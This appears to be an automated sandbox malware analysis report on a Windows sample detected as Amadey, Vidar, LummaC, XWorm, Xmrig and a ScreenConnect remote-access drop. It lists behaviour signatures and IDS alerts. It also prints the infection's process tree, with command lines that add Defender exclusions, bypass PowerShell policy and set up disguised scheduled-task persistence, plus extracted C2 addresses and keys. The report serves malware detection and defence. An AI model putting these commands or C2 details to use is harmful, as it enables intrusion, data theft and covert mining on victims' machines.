Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Vidar stealer
Yara detected XWorm
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to hide user accounts
Creates multiple autostart registry keys
Enables network access during safeboot for specific services
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies security policies related information
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Possible COM Object hijacking
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to resolve many domain names, but no domain seems valid
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Yara signature match
Classification
- System is w10x64
- file.exe (PID: 6592 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: B2D635CD0D52AB71037418AE9AF2EF35) - skotes.exe (PID: 7088 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\abc3bc 1985\skote s.exe" MD5: B2D635CD0D52AB71037418AE9AF2EF35)
- skotes.exe (PID: 3636 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\abc3bc1 985\skotes .exe MD5: B2D635CD0D52AB71037418AE9AF2EF35) - 94CwbGg.exe (PID: 3052 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101530 5001\94Cwb Gg.exe" MD5: 99185DC24928425C630A83F657AF829D) - msiexec.exe (PID: 2212 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \ScreenCon nect\24.3. 7.9067\eec ac53463291 819\Screen Connect.Cl ientSetup. msi" MD5: 9D09DC1EDA745A5F87553048E57620CF) - WSgtv5G.exe (PID: 5212 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101530 6001\WSgtv 5G.exe" MD5: 84BE7D4E0C1DB5AF08F3C2BA70BD0D55) - powershell.exe (PID: 5544 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\user \AppData\L ocal\Temp\ 1015306001 \WSgtv5G.e xe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5604 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6240 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' WSgtv5G.ex e' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6408 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ ProgramDat a\services w.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1668 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' servicesw. exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2588 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - 1d4269f0ef.exe (PID: 6804 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101531 9001\1d426 9f0ef.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA) - cmd.exe (PID: 5172 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\main \main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mode.com (PID: 1364 cmdline:
mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875) - 7z.exe (PID: 4500 cmdline:
7z.exe e f ile.zip -p 2429171142 3417250691 697322505 -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 6336 cmdline:
7z.exe e e xtracted/f ile_7.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 2344 cmdline:
7z.exe e e xtracted/f ile_6.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 2008 cmdline:
7z.exe e e xtracted/f ile_5.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 6448 cmdline:
7z.exe e e xtracted/f ile_4.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 6436 cmdline:
7z.exe e e xtracted/f ile_3.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 2588 cmdline:
7z.exe e e xtracted/f ile_2.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - 7z.exe (PID: 1464 cmdline:
7z.exe e e xtracted/f ile_1.zip -oextracte d MD5: 619F7135621B50FD1900FF24AADE1524) - attrib.exe (PID: 6932 cmdline:
attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - in.exe (PID: 2932 cmdline:
"in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE) - attrib.exe (PID: 4132 cmdline:
attrib +H +S C:\User s\user\App Data\Roami ng\Intel_P TT_EK_Rece rtificatio n.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - conhost.exe (PID: 3828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - attrib.exe (PID: 5068 cmdline:
attrib +H C:\Users\u ser\AppDat a\Roaming\ Intel_PTT_ EK_Recerti fication.e xe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - conhost.exe (PID: 1284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5740 cmdline:
schtasks / f /CREATE /TN "Intel _PTT_EK_Re certificat ion" /TR " C:\Users\u ser\AppDat a\Roaming\ Intel_PTT_ EK_Recerti fication.e xe" /SC MI NUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 5272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3176 cmdline:
powershell ping 127. 0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 744 cmdline:
"C:\Window s\system32 \PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D) - 027c22262c.exe (PID: 7120 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101532 0001\027c2 2262c.exe" MD5: 28E568616A7B792CAC1726DEB77D9039) - conhost.exe (PID: 4348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - 027c22262c.exe (PID: 6708 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101532 0001\027c2 2262c.exe" MD5: 28E568616A7B792CAC1726DEB77D9039) - 2c1806d401.exe (PID: 5844 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101532 1001\2c180 6d401.exe" MD5: DFD5F78A711FA92337010ECC028470B4)
- msiexec.exe (PID: 5064 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 4048 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 4DAB2E9 CBC9CA1FB7 C63C15C82D D8385 C MD5: 9D09DC1EDA745A5F87553048E57620CF) - rundll32.exe (PID: 7060 cmdline:
rundll32.e xe "C:\Use rs\user\Ap pData\Loca l\Temp\MSI 4625.tmp", zzzzInvoke ManagedCus tomActionO utOfProc S fxCA_72925 78 1 Scree nConnect.I nstallerAc tions!Scre enConnect. ClientInst allerActio ns.FixupSe rviceArgum ents MD5: 889B99C52A60DD49227C5E485A016679) - msiexec.exe (PID: 3272 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng FC4291F BE4CB99A66 66788BD972 20A8F MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 6420 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 877B69E 242CCEF77C A5AAF2025D 97006 E Gl obal\MSI00 00 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- ScreenConnect.ClientService.exe (PID: 6528 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (eeca c534632918 19)\Screen Connect.Cl ientServic e.exe" "?e =Access&y= Guest&h=in stance-cxe sop-relay. screenconn ect.com&p= 443&s=314b a130-6f44- 4bf3-a1b4- fb563b4ccf 5f&k=BgIAA ACkAABSU0E xAAgAAAEAA QDx1DHr4t4 dt8ezw9lB% 2fAZu61lzO gi0vaiVYGd RvGLHe%2fM cvb5Lpv%2f MiRt%2bnJ3 tq%2frtseQ SQWvbbVdRj xfce31nmME p%2f1PAVmT l3fwEYA1nC r0dd%2fV%2 bMSoMjceav Up0WVj7eRW HA6bNGzYSn 5o73ZcILBd Rw%2f3jSJ6 CgAPJBVMmu v7rFKKZ%2b 5N8sdLjxWR OqyQbD%2b% 2fVYbOCjPS B41oQm%2fe Za3S3dqb54 HfFBeo03T9 ZLnc4oQ65M abx8v%2bIK hwdH15qLzb e2qCb8palN Ln0UxIAV2t lJJHkIQXrY LlVVfpFPJX j118ZgMG7G UqfzoT1k56 csyoWsFLZC lXlsSLEHGC 8" MD5: 75B21D04C69128A7230A0998086B61AA) - ScreenConnect.WindowsClient.exe (PID: 3520 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (eeca c534632918 19)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "90 58f34d-309 d-4853-9b5 5-f4b348c5 8a42" "Use r" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
- svchost.exe (PID: 1988 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Intel_PTT_EK_Recertification.exe (PID: 3756 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Intel_PTT_ EK_Recerti fication.e xe MD5: 83D75087C9BF6E4F07C36E550731CCDE) - explorer.exe (PID: 1364 cmdline:
explorer.e xe MD5: 662F4F92FDE3557E86D110526BB578D5) - powershell.exe (PID: 2032 cmdline:
powershell ping 127. 1.10.1; de l Intel_PT T_EK_Recer tification .exe MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1376 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 5816 cmdline:
"C:\Window s\system32 \PING.EXE" 127.1.10. 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Vidar | Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
{"C2 url": ["87.120.127.228"], "Port": 3512, "Aes key": "56213489432131", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
Click to see the 25 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
Click to see the 18 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:51.337442+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49878 | 104.21.79.7 | 443 | TCP |
2024-12-14T21:57:55.564796+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49891 | 23.67.133.187 | 443 | TCP |
2024-12-14T21:58:02.634813+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49912 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:04.906078+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49920 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:07.507184+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49932 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:11.967427+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49944 | 23.67.133.187 | 443 | TCP |
2024-12-14T21:58:17.214132+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49963 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:19.304463+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49974 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:21.396588+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49981 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:26.438812+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49995 | 23.67.133.187 | 443 | TCP |
2024-12-14T21:58:43.182145+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 50031 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:45.486712+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 50037 | 172.67.207.38 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:52.042842+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49878 | 104.21.79.7 | 443 | TCP |
2024-12-14T21:58:03.359396+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49912 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:05.906952+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49920 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:08.216082+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49932 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:17.973313+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49963 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:20.017171+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49974 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:22.176630+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49981 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:44.213975+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:46.207267+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 172.67.207.38 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:52.042842+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49878 | 104.21.79.7 | 443 | TCP |
2024-12-14T21:58:03.359396+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49912 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:05.906952+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49920 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:08.216082+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49932 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:17.973313+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49963 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:20.017171+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49974 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:22.176630+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49981 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:44.213975+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:46.207267+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 172.67.207.38 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:07.507184+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49932 | 104.21.96.1 | 443 | TCP |
2024-12-14T21:58:21.396588+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49981 | 104.21.96.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:04.906078+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49920 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:19.304463+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49974 | 172.67.207.38 | 443 | TCP |
2024-12-14T21:58:45.486712+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 50037 | 172.67.207.38 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:02.634813+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49912 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:17.214132+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49963 | 172.67.164.37 | 443 | TCP |
2024-12-14T21:58:43.182145+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 50031 | 172.67.164.37 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:21.912898+0100 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49792 | 185.215.113.43 | 80 | TCP |
2024-12-14T21:57:30.419234+0100 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 185.215.113.43 | 80 | TCP |
2024-12-14T21:57:42.634474+0100 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49853 | 185.215.113.43 | 80 | TCP |
2024-12-14T21:57:49.393914+0100 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49871 | 185.215.113.43 | 80 | TCP |
2024-12-14T21:57:55.548505+0100 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49890 | 185.215.113.43 | 80 | TCP |
2024-12-14T21:58:03.935154+0100 | 2044696 | 1 | A Network Trojan was detected | 192.168.2.4 | 49916 | 185.215.113.43 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:09.544537+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 52888 | 1.1.1.1 | 53 | UDP |
2024-12-14T21:58:24.081020+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58782 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:53.022018+0100 | 2057973 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53430 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:53.275021+0100 | 2057975 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49657 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:05.969925+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 57671 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:09.018198+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53480 | 1.1.1.1 | 53 | UDP |
2024-12-14T21:58:23.143517+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 61837 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:08.785979+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 63997 | 1.1.1.1 | 53 | UDP |
2024-12-14T21:58:22.737409+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62835 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:57:52.533793+0100 | 2057979 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62479 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-14T21:58:08.225465+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 52289 | 1.1.1.1 | 53 | UDP |
